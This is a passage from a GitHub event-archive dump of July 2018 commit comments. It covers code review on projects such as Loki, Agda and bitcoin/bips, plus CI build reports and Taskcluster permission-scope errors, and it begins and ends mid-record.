attacker can only send requests. He can't read the response coming from the server (otherwise you'll have much more serious issues)\r\nSo there is no issue with sending the token back which will allow your UI to replace the token if it's invalid"}},"created_at":"2018-07-05T03:56:49Z"}
{"id":"7920853417","type":"CommitCommentEvent","actor":{"login":"ybq93933"},"repo":{"name":"ybq93933/SpringCloud-Learning"},"payload":{"comment":{"id":29601213,"position":null,"line":null,"path":null,"commit_id":"64994babfda82cbe43f10ef30fecbcc132a90d99","created_at":"2018-07-05T03:57:41Z","updated_at":"2018-07-05T03:57:41Z","author_association":"OWNER","body":"from=git-default-1.0"}},"created_at":"2018-07-05T03:57:41Z"}
{"id":"7920854246","type":"CommitCommentEvent","actor":{"login":"jcktm"},"repo":{"name":"Doy-lee/loki"},"payload":{"comment":{"id":29601215,"position":13,"line":518,"path":"src/cryptonote_core/service_node_deregister.cpp","commit_id":"3927d4877cc6083092aa1a25944a62a6e4427a33","created_at":"2018-07-05T03:58:07Z","updated_at":"2018-07-05T03:58:07Z","author_association":"NONE","body":"Nice"}},"created_at":"2018-07-05T03:58:07Z"}
{"id":"7920858169","type":"CommitCommentEvent","actor":{"login":"multiplemonomials"},"repo":{"name":"tcooc/AdditionalPipesBC"},"payload":{"comment":{"id":29601222,"position":5,"line":8,"path":"src/main/resources/assets/additionalpipes/lang/en_US.lang","commit_id":"9c73c86b48ca89c3d4d339b7dded88fef11c84cf","created_at":"2018-07-05T04:00:04Z","updated_at":"2018-07-05T04:00:04Z","author_association":"COLLABORATOR","body":"Sorry, as I said, I'm waiting for Buildcraft to add the required APIs for me to do this.  I've had talks with AlexIIL (the BC lead dev) and he agreed to work on it, but it is highly probable that it won't happen until the official BC8.0 release (as in, after the end of the 7.99.x betas)."}},"created_at":"2018-07-05T04:00:04Z"}
{"id":"7920858631","type":"CommitCommentEvent","actor":{"login":"hathach"},"repo":{"name":"adafruit/circuitpython"},"payload":{"comment":{"id":29601225,"position":null,"line":null,"path":null,"commit_id":"7fff7f5e70c652ccffce2a598a4e3b7df92ad67b","created_at":"2018-07-05T04:00:15Z","updated_at":"2018-07-05T04:00:15Z","author_association":"MEMBER","body":"ah thanks, I will try to look up its datasheet. Here is how I wil try to implement nrf52840 will power up and detect the present of qspi, if it is then msc will expose that, otherwise, expose the internal flash.\r\n\r\nNote: the vid/pid may/may not be different internal & external flash (just to conform the OS), I am not sure about the serial, but the volume ID may need to be different as well. We will see."}},"created_at":"2018-07-05T04:00:15Z"}
{"id":"7920873838","type":"CommitCommentEvent","actor":{"login":"saiqulhaq"},"repo":{"name":"saiqulhaq/ar_transaction_changes"},"payload":{"comment":{"id":29601246,"position":null,"line":null,"path":null,"commit_id":"532a06f81d5442c628b8989ec7d48d3c252a4a2c","created_at":"2018-07-05T04:07:33Z","updated_at":"2018-07-05T04:07:33Z","author_association":"OWNER","body":"https://github.com/dylanahsmith/ar_transaction_changes/pull/19"}},"created_at":"2018-07-05T04:07:33Z"}
{"id":"7920875728","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29601249,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-05T04:08:32Z","updated_at":"2018-07-05T04:08:32Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-05T04:08:32Z"}
{"id":"7920878685","type":"CommitCommentEvent","actor":{"login":"SH-anonta"},"repo":{"name":"SH-anonta/Task-Tree-Client"},"payload":{"comment":{"id":29601252,"position":52,"line":49,"path":"src/app/page-components/project/project-details/project-details.component.html","commit_id":"42556fa104180540d720b6fa5d6975547af365f6","created_at":"2018-07-05T04:10:04Z","updated_at":"2018-07-05T04:10:04Z","author_association":"OWNER","body":"Remove text-danger class from paragraph elements\r\nAnd put the data in a table with two columns"}},"created_at":"2018-07-05T04:10:04Z"}
{"id":"7920878716","type":"CommitCommentEvent","actor":{"login":"jcktm"},"repo":{"name":"Doy-lee/loki"},"payload":{"comment":{"id":29601253,"position":92,"line":458,"path":"src/cryptonote_core/service_node_list.cpp","commit_id":"3927d4877cc6083092aa1a25944a62a6e4427a33","created_at":"2018-07-05T04:10:05Z","updated_at":"2018-07-05T04:10:05Z","author_association":"NONE","body":"Extracting this list should be done in another function, and it needs to be sorted by reward_pair.second."}},"created_at":"2018-07-05T04:10:05Z"}
{"id":"7920878948","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29601254,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-05T04:10:12Z","updated_at":"2018-07-05T04:10:12Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-05T04:10:12Z"}
{"id":"7920879762","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29601257,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-05T04:10:38Z","updated_at":"2018-07-05T04:10:38Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-05T04:10:38Z"}
{"id":"7920880740","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29601258,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-05T04:11:11Z","updated_at":"2018-07-05T04:11:11Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-05T04:11:11Z"}
{"id":"7920880813","type":"CommitCommentEvent","actor":{"login":"shimoyashikikeisuke"},"repo":{"name":"shimoyashikikeisuke/g031o082"},"payload":{"comment":{"id":29601259,"position":null,"line":null,"path":null,"commit_id":"e13fd74c03781711fc09814e161b7e207bc3b9a5","created_at":"2018-07-05T04:11:13Z","updated_at":"2018-07-05T04:11:13Z","author_association":"OWNER","body":"$git rm FILENAME"}},"created_at":"2018-07-05T04:11:13Z"}
{"id":"7920881163","type":"CommitCommentEvent","actor":{"login":"jcktm"},"repo":{"name":"Doy-lee/loki"},"payload":{"comment":{"id":29601260,"position":113,"line":479,"path":"src/cryptonote_core/service_node_list.cpp","commit_id":"3927d4877cc6083092aa1a25944a62a6e4427a33","created_at":"2018-07-05T04:11:25Z","updated_at":"2018-07-05T04:11:25Z","author_association":"NONE","body":"QUORUM_SIZE"}},"created_at":"2018-07-05T04:11:25Z"}
{"id":"7920882871","type":"CommitCommentEvent","actor":{"login":"tamasblummer"},"repo":{"name":"bitcoin/bips"},"payload":{"comment":{"id":29601265,"position":12,"line":280,"path":"bip-0158.mediawiki","commit_id":"6cc0c85a10b013107f45e01c5580a924f97f6e5b","created_at":"2018-07-05T04:12:18Z","updated_at":"2018-07-05T04:12:18Z","author_association":"NONE","body":"More precisely: \"..., aside from all output scripts that start with the <code>OP_RETURN</code> opcode.\""}},"created_at":"2018-07-05T04:12:18Z"}
{"id":"7920882981","type":"CommitCommentEvent","actor":{"login":"feret"},"repo":{"name":"Kappa-Dev/KaSim"},"payload":{"comment":{"id":29601266,"position":null,"line":null,"path":null,"commit_id":"caf2d955539b2feef2e3951da23ba1b32b39f42c","created_at":"2018-07-05T04:12:22Z","updated_at":"2018-07-05T04:12:22Z","author_association":"CONTRIBUTOR","body":"Sure, shame on me. "}},"created_at":"2018-07-05T04:12:22Z"}
{"id":"7920886281","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29601268,"position":null,"line":null,"path":null,"commit_id":"3604c4b04b4d86ca311ecdfe73e75227cc429760","created_at":"2018-07-05T04:13:53Z","updated_at":"2018-07-05T04:13:53Z","author_association":"COLLABORATOR","body":"✅ [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/68/display/redirect) (on internal Jenkins) succeeded\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/68//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/3604c4b04b4d86ca311ecdfe73e75227cc429760/68/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/3604c4b04b4d86ca311ecdfe73e75227cc429760/68/jenkins-results/apicomparison/index.html) (🔥 breaking changes 🔥)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/3604c4b04b4d86ca311ecdfe73e75227cc429760/68/jenkins-results/generator-diff/index.html) (please review changes)\n✅ [Test run succeeded](http://xamarin-storage/jenkins/xamarin-macios/xcode10/3604c4b04b4d86ca311ecdfe73e75227cc429760/68/jenkins-results/tests/index.html)\n"}},"created_at":"2018-07-05T04:13:53Z"}
{"id":"7920888610","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29601271,"position":null,"line":null,"path":null,"commit_id":"fb6546440b270cc144874a629e6930f014d02aee","created_at":"2018-07-05T04:15:05Z","updated_at":"2018-07-05T04:15:05Z","author_association":"NONE","body":"Refactor_UnitarySystem (rraustad) - Win64-Windows-7-VisualStudio-14: OK (2931 of 2932 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 625\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fb6546440b270cc144874a629e6930f014d02aee-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fb6546440b270cc144874a629e6930f014d02aee-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-05T04:15:05Z"}
{"id":"7920889448","type":"CommitCommentEvent","actor":{"login":"timmyrs"},"repo":{"name":"bullgit/WAT"},"payload":{"comment":{"id":29601276,"position":null,"line":null,"path":null,"commit_id":"532dd54b49ea93d2559f5f6a413b18e830c0362e","created_at":"2018-07-05T04:15:30Z","updated_at":"2018-07-05T04:15:30Z","author_association":"NONE","body":"If you don't know the difference of `$a++` and `++$a`, consider learning the language, lol.\r\nAlso, http://0.30000000000000004.com/ might help you understand floating point maths."}},"created_at":"2018-07-05T04:15:30Z"}
{"id":"7920890725","type":"CommitCommentEvent","actor":{"login":"shamimhasan"},"repo":{"name":"santigarcor/laratrust"},"payload":{"comment":{"id":29601280,"position":null,"line":null,"path":null,"commit_id":"4c5e7505b102b98dec93924d57563a0cefb4efc5","created_at":"2018-07-05T04:16:10Z","updated_at":"2018-07-05T04:16:10Z","author_association":"NONE","body":"thank you"}},"created_at":"2018-07-05T04:16:10Z"}
{"id":"7920893980","type":"CommitCommentEvent","actor":{"login":"ckyvs"},"repo":{"name":"ckyvs/Ciphers"},"payload":{"comment":{"id":29601286,"position":null,"line":null,"path":null,"commit_id":"543dad5eecde437ca8989563d5e9bd077f8a4d34","created_at":"2018-07-05T04:17:45Z","updated_at":"2018-07-05T04:17:45Z","author_association":"OWNER","body":"Caesar cipher\r\n"}},"created_at":"2018-07-05T04:17:45Z"}
{"id":"7920894804","type":"CommitCommentEvent","actor":{"login":"jcktm"},"repo":{"name":"Doy-lee/loki"},"payload":{"comment":{"id":29601287,"position":125,"line":491,"path":"src/cryptonote_core/service_node_list.cpp","commit_id":"3927d4877cc6083092aa1a25944a62a6e4427a33","created_at":"2018-07-05T04:18:08Z","updated_at":"2018-07-05T04:18:08Z","author_association":"NONE","body":"0.1f is 10 percent, not 1%\r\n\r\nUse num_nodes_to_test = std::max(num_remaining_nodes/NTH_OF_THE_NETWORK_TO_TEST, std::min(MINIMUM_NODES_TO_TEST, num_remaining_nodes))\r\n\r\n#define NTH_OF_THE_NETWORK_TO_TEST 100\r\n#define MINIMUM_NODES_TO_TEST 50"}},"created_at":"2018-07-05T04:18:08Z"}
{"id":"7920898519","type":"CommitCommentEvent","actor":{"login":"asr"},"repo":{"name":"agda/agda"},"payload":{"comment":{"id":29601290,"position":null,"line":null,"path":null,"commit_id":"18743484d0a0f01e068287fe50a465d8e0044699","created_at":"2018-07-05T04:20:00Z","updated_at":"2018-07-05T04:20:00Z","author_association":"MEMBER","body":"In my work-flow the suffix is useful when working with different versions of Agda."}},"created_at":"2018-07-05T04:20:00Z"}
{"id":"7920900187","type":"CommitCommentEvent","actor":{"login":"EmeraldTiger"},"repo":{"name":"EmeraldTiger/Uber-Arena"},"payload":{"comment":{"id":29601293,"position":24,"line":989,"path":"ioq3-master/code/game/g_active.c","commit_id":"8f5c6fd4de9d79961acd2d30dc2e5a26bf446e8c","created_at":"2018-07-05T04:20:48Z","updated_at":"2018-07-05T04:20:48Z","author_association":"OWNER","body":"Currently the best method I can think of right now. Only other way I can think of is passing a bunch of parameters through pmove which would be a lot messier and harder to maintain. Haven't experienced any issues moving this code over so far, but let me know if you notice anything off."}},"created_at":"2018-07-05T04:20:48Z"}
{"id":"7920901328","type":"CommitCommentEvent","actor":{"login":"mkcor"},"repo":{"name":"mkcor/scipy_proceedings"},"payload":{"comment":{"id":29601295,"position":19,"line":161,"path":"papers/vamvourellis_corvellec/vamvourellis_corvellec.rst","commit_id":"1785ce0906ffc0819181e949983a3838efed1f54","created_at":"2018-07-05T04:21:22Z","updated_at":"2018-07-05T04:21:22Z","author_association":"OWNER","body":"@bayesways Replace \"the Bayes rule\" with \"Bayes’ rule\""}},"created_at":"2018-07-05T04:21:22Z"}
{"id":"7920915967","type":"CommitCommentEvent","actor":{"login":"manuel-uberti"},"repo":{"name":"purcell/emacs.d"},"payload":{"comment":{"id":29601312,"position":null,"line":null,"path":null,"commit_id":"a1cfcc1a7dc043453f3ce08a5618649a62f3664c","created_at":"2018-07-05T04:28:50Z","updated_at":"2018-07-05T04:28:50Z","author_association":"NONE","body":"Following your Haskell setup closely :)\r\n```\r\n❯ stack path --local-install-root\r\n/home/manuel/.stack/global-project/.stack-work/install/x86_64-linux/lts-11.6/8.2.2\r\n\r\n~ \r\n❯ ls -lah .stack/global-project/.stack-work/install/x86_64-linux/lts-11.6/8.2.2/\r\nPermissions Size User   Date Modified Name\r\ndrwxr-xr-x     - manuel  3 lug  9:12  flag-cache\r\ndrwxr-xr-x     - manuel 29 apr 15:05  pkgdb\r\n```\r\nShould I have a `bin` directory along with these other two to have your code working?"}},"created_at":"2018-07-05T04:28:50Z"}
{"id":"7920920230","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29601321,"position":4,"line":null,"path":"app/src/at-thachnguyen/java/asiantech/internship/summer/drawer_layout/DrawerLayoutActivity.java","commit_id":"f25a038e5b75a1ccb28178ee9cfdbec388d47a1e","created_at":"2018-07-05T04:30:53Z","updated_at":"2018-07-05T04:30:53Z","author_association":"NONE","body":"WARNING: [UnusedImports] Avoid unused imports such as 'android.app.Application'\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/imports.html#UnusedImports"}},"created_at":"2018-07-05T04:30:53Z"}
{"id":"7920920240","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29601322,"position":5,"line":null,"path":"app/src/at-thachnguyen/java/asiantech/internship/summer/drawer_layout/DrawerLayoutActivity.java","commit_id":"f25a038e5b75a1ccb28178ee9cfdbec388d47a1e","created_at":"2018-07-05T04:30:53Z","updated_at":"2018-07-05T04:30:53Z","author_association":"NONE","body":"WARNING: [UnusedImports] Avoid unused imports such as 'android.content.Context'\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/imports.html#UnusedImports"}},"created_at":"2018-07-05T04:30:53Z"}
{"id":"7920920248","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29601323,"position":62,"line":null,"path":"app/src/at-thachnguyen/java/asiantech/internship/summer/drawer_layout/DrawerLayoutActivity.java","commit_id":"f25a038e5b75a1ccb28178ee9cfdbec388d47a1e","created_at":"2018-07-05T04:30:53Z","updated_at":"2018-07-05T04:30:53Z","author_association":"NONE","body":"WARNING: [AvoidPrintStackTrace] Avoid printStackTrace(); use a logger call instead.\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/logging-java.html#AvoidPrintStackTrace"}},"created_at":"2018-07-05T04:30:53Z"}
{"id":"7920921202","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":29601330,"position":null,"line":null,"path":null,"commit_id":"dd31eb80c001d4571f89eb2be52dbdc022c60ae9","created_at":"2018-07-05T04:31:21Z","updated_at":"2018-07-05T04:31:21Z","author_association":"COLLABORATOR","body":"Also see [Issue 679](https://github.com/weidai11/cryptopp/issues/679)."}},"created_at":"2018-07-05T04:31:21Z"}
{"id":"7920921352","type":"CommitCommentEvent","actor":{"login":"wkozaczuk"},"repo":{"name":"cloudius-systems/osv"},"payload":{"comment":{"id":29601331,"position":null,"line":null,"path":null,"commit_id":"219dcfd10990151fedc75c95fa8e24ebc46711c9","created_at":"2018-07-05T04:31:25Z","updated_at":"2018-07-05T04:31:25Z","author_association":"COLLABORATOR","body":"@problame Regarding your MySQL scalability problem it might be related to this issue - #450 and this commit https://github.com/cloudius-systems/osv/commit/b5eadc37f12c4b97a52705830d2d9097498049c2 which was reverted due to some deadlock - https://github.com/cloudius-systems/osv/commit/697943f631960b3d55f66381581e1435b726a1a8. @nyh may have more information."}},"created_at":"2018-07-05T04:31:25Z"}
{"id":"7920928327","type":"CommitCommentEvent","actor":{"login":"Anirban166"},"repo":{"name":"sahu2201/Autobots"},"payload":{"comment":{"id":29601346,"position":null,"line":null,"path":null,"commit_id":"ce0b204dce3ae67ea4638f39a831720c12ceadec","created_at":"2018-07-05T04:35:06Z","updated_at":"2018-07-05T04:35:06Z","author_association":"COLLABORATOR","body":"yep thora change"}},"created_at":"2018-07-05T04:35:06Z"}
{"id":"7920928795","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"servo/servo"},"payload":{"comment":{"id":29601348,"position":null,"line":null,"path":null,"commit_id":"5c2c7d2ea7261c1f0db2e417f79234698ce69712","created_at":"2018-07-05T04:35:21Z","updated_at":"2018-07-05T04:35:21Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nYou do not have sufficient scopes. You are missing the following scopes:\n\n```\n{\n  \"AnyOf\": [\n    {\n      \"AnyOf\": [\n        \"queue:create-task:highest:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:very-high:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:high:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:medium:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:low:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:very-low:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:lowest:aws-provisioner-v1/servo-docker-worker\"\n      ]\n    },\n    {\n      \"AnyOf\": [\n        \"queue:create-task:aws-provisioner-v1/servo-docker-worker\",\n        {\n          \"AllOf\": [\n            \"queue:define-task:aws-provisioner-v1/servo-docker-worker\",\n            \"queue:task-group-id:taskcluster-github/aUboL2uzSemb72SGGB2Ojw\",\n            \"queue:schedule-task:taskcluster-github/aUboL2uzSemb72SGGB2Ojw/aUboL2uzSemb72SGGB2Ojw\"\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\nYou have the scopes:\n\n```\n[\n  \"assume:project:taskcluster:mozilla-github-repository\",\n  \"assume:repo:github.com/servo/servo:pull-request\",\n  \"notify:email:*\",\n  \"notify:irc-channel:*\",\n  \"notify:irc-user:*\",\n  \"queue:create-task:aws-provisioner-v1/github-worker\",\n  \"queue:create-task:aws-provisioner-v1/github-worker-windows\",\n  \"queue:create-task:aws-provisioner-v1/servo\",\n  \"queue:create-task:aws-provisioner-v1/win2012r2\",\n  \"queue:route:garbage.*\",\n  \"queue:route:index.garbage.*\",\n  \"queue:route:notify.email.*\",\n  \"queue:route:notify.irc-channel.*\",\n  \"queue:route:notify.irc-user.*\",\n  \"queue:scheduler-id:taskcluster-github\",\n  \"secrets:get:garbage/*\",\n  \"secrets:set:garbage/*\"\n]\n```\n\nThis request requires you to satisfy this scope expression:\n\n```\n{\n  \"AllOf\": [\n    {\n      \"AnyOf\": [\n        {\n          \"AllOf\": [\n            \"queue:scheduler-id:taskcluster-github\",\n            {\n              \"AnyOf\": [\n                \"queue:create-task:highest:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:very-high:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:high:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:medium:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:low:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:very-low:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:lowest:aws-provisioner-v1/servo-docker-worker\"\n              ]\n            }\n          ]\n        },\n        {\n          \"AnyOf\": [\n            \"queue:create-task:aws-provisioner-v1/servo-docker-worker\",\n            {\n              \"AllOf\": [\n                \"queue:define-task:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:task-group-id:taskcluster-github/aUboL2uzSemb72SGGB2Ojw\",\n                \"queue:schedule-task:taskcluster-github/aUboL2uzSemb72SGGB2Ojw/aUboL2uzSemb72SGGB2Ojw\"\n              ]\n            }\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\n---\n\n* method:     createTask\n* errorCode:  InsufficientScopes\n* statusCode: 403\n* time:       2018-07-05T04:35:20.933Z\n\n</details>"}},"created_at":"2018-07-05T04:35:21Z"}
{"id":"7920929060","type":"CommitCommentEvent","actor":{"login":"eminkarimov"},"repo":{"name":"eminkarimov/vcs"},"payload":{"comment":{"id":29601350,"position":null,"line":null,"path":null,"commit_id":"79605694dad6014136a75b90cdc0cd45c3129800","created_at":"2018-07-05T04:35:30Z","updated_at":"2018-07-05T04:35:30Z","author_association":"OWNER","body":"Hellodan sonra  nida olmalidi"}},"created_at":"2018-07-05T04:35:30Z"}
{"id":"7920930900","type":"CommitCommentEvent","actor":{"login":"jcktm"},"repo":{"name":"Doy-lee/loki"},"payload":{"comment":{"id":29601353,"position":43,"line":95,"path":"src/cryptonote_core/service_node_list.cpp","commit_id":"3927d4877cc6083092aa1a25944a62a6e4427a33","created_at":"2018-07-05T04:36:26Z","updated_at":"2018-07-05T04:36:26Z","author_association":"NONE","body":"Put this function back in, have it sort the pubkeys by pubkey_last_reward_pair.second descending, and use this function in store_quorum_state_from_rewards_list()"}},"created_at":"2018-07-05T04:36:26Z"}
{"id":"7920934157","type":"CommitCommentEvent","actor":{"login":"jcktm"},"repo":{"name":"Doy-lee/loki"},"payload":{"comment":{"id":29601356,"position":35,"line":98,"path":"src/cryptonote_core/service_node_list.cpp","commit_id":"3927d4877cc6083092aa1a25944a62a6e4427a33","created_at":"2018-07-05T04:38:06Z","updated_at":"2018-07-05T04:38:06Z","author_association":"NONE","body":"Move this block into block_added_generic, it gets called from multiple locations."}},"created_at":"2018-07-05T04:38:06Z"}
{"id":"7920935212","type":"CommitCommentEvent","actor":{"login":"futurejones"},"repo":{"name":"apple/swift-compiler-rt"},"payload":{"comment":{"id":29601358,"position":null,"line":null,"path":null,"commit_id":"4ca89b7a97fc9d9bd8ca00e7d7bfd114d85fc29c","created_at":"2018-07-05T04:38:42Z","updated_at":"2018-07-05T04:38:42Z","author_association":"NONE","body":"@cheshire  yes. \r\nThis is currently breaking the swift-4.2-branch and master builds in https://ci-external.swift.org/computer/ubuntu-16.04-aarch64/\r\nWe need this fixed in the \"swift-4.2-branch\" and the \"stable\" branch.\r\nThanks"}},"created_at":"2018-07-05T04:38:42Z"}
{"id":"7920936773","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"servo/servo"},"payload":{"comment":{"id":29601362,"position":null,"line":null,"path":null,"commit_id":"ebaf7cdf59eb27211dbe07d07987c7ba6d95687f","created_at":"2018-07-05T04:39:31Z","updated_at":"2018-07-05T04:39:31Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nYou do not have sufficient scopes. You are missing the following scopes:\n\n```\n{\n  \"AnyOf\": [\n    {\n      \"AnyOf\": [\n        \"queue:create-task:highest:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:very-high:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:high:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:medium:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:low:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:very-low:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:lowest:aws-provisioner-v1/servo-docker-worker\"\n      ]\n    },\n    {\n      \"AnyOf\": [\n        \"queue:create-task:aws-provisioner-v1/servo-docker-worker\",\n        {\n          \"AllOf\": [\n            \"queue:define-task:aws-provisioner-v1/servo-docker-worker\",\n            \"queue:task-group-id:taskcluster-github/ZPbWvl0UTOqDOsskdaBQrA\",\n            \"queue:schedule-task:taskcluster-github/ZPbWvl0UTOqDOsskdaBQrA/ZPbWvl0UTOqDOsskdaBQrA\"\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\nYou have the scopes:\n\n```\n[\n  \"assume:project:taskcluster:mozilla-github-repository\",\n  \"assume:repo:github.com/servo/servo:pull-request\",\n  \"notify:email:*\",\n  \"notify:irc-channel:*\",\n  \"notify:irc-user:*\",\n  \"queue:create-task:aws-provisioner-v1/github-worker\",\n  \"queue:create-task:aws-provisioner-v1/github-worker-windows\",\n  \"queue:create-task:aws-provisioner-v1/servo\",\n  \"queue:create-task:aws-provisioner-v1/win2012r2\",\n  \"queue:route:garbage.*\",\n  \"queue:route:index.garbage.*\",\n  \"queue:route:notify.email.*\",\n  \"queue:route:notify.irc-channel.*\",\n  \"queue:route:notify.irc-user.*\",\n  \"queue:scheduler-id:taskcluster-github\",\n  \"secrets:get:garbage/*\",\n  \"secrets:set:garbage/*\"\n]\n```\n\nThis request requires you to satisfy this scope expression:\n\n```\n{\n  \"AllOf\": [\n    {\n      \"AnyOf\": [\n        {\n          \"AllOf\": [\n            \"queue:scheduler-id:taskcluster-github\",\n            {\n              \"AnyOf\": [\n                \"queue:create-task:highest:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:very-high:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:high:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:medium:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:low:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:very-low:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:lowest:aws-provisioner-v1/servo-docker-worker\"\n              ]\n            }\n          ]\n        },\n        {\n          \"AnyOf\": [\n            \"queue:create-task:aws-provisioner-v1/servo-docker-worker\",\n            {\n              \"AllOf\": [\n                \"queue:define-task:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:task-group-id:taskcluster-github/ZPbWvl0UTOqDOsskdaBQrA\",\n                \"queue:schedule-task:taskcluster-github/ZPbWvl0UTOqDOsskdaBQrA/ZPbWvl0UTOqDOsskdaBQrA\"\n              ]\n            }\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\n---\n\n* method:     createTask\n* errorCode:  InsufficientScopes\n* statusCode: 403\n* time:       2018-07-05T04:39:31.210Z\n\n</details>"}},"created_at":"2018-07-05T04:39:31Z"}
{"id":"7920938041","type":"CommitCommentEvent","actor":{"login":"UlfNorell"},"repo":{"name":"agda/agda"},"payload":{"comment":{"id":29601363,"position":null,"line":null,"path":null,"commit_id":"18743484d0a0f01e068287fe50a465d8e0044699","created_at":"2018-07-05T04:40:09Z","updated_at":"2018-07-05T04:40:09Z","author_association":"MEMBER","body":"The idea was that we should use the current master in the same way as we used stable before. The emacs mode knows about versions (`agda2-mode-set-program-version` or something), are you saying that this doesn't default to the correct version?"}},"created_at":"2018-07-05T04:40:09Z"}
{"id":"7920945308","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"servo/servo"},"payload":{"comment":{"id":29601369,"position":null,"line":null,"path":null,"commit_id":"64b0a1aa4b8f56ebcc64c09a46c84b3f068ac045","created_at":"2018-07-05T04:43:59Z","updated_at":"2018-07-05T04:43:59Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nYou do not have sufficient scopes. You are missing the following scopes:\n\n```\n{\n  \"AnyOf\": [\n    {\n      \"AnyOf\": [\n        \"queue:create-task:highest:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:very-high:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:high:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:medium:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:low:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:very-low:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:lowest:aws-provisioner-v1/servo-docker-worker\"\n      ]\n    },\n    {\n      \"AnyOf\": [\n        \"queue:create-task:aws-provisioner-v1/servo-docker-worker\",\n        {\n          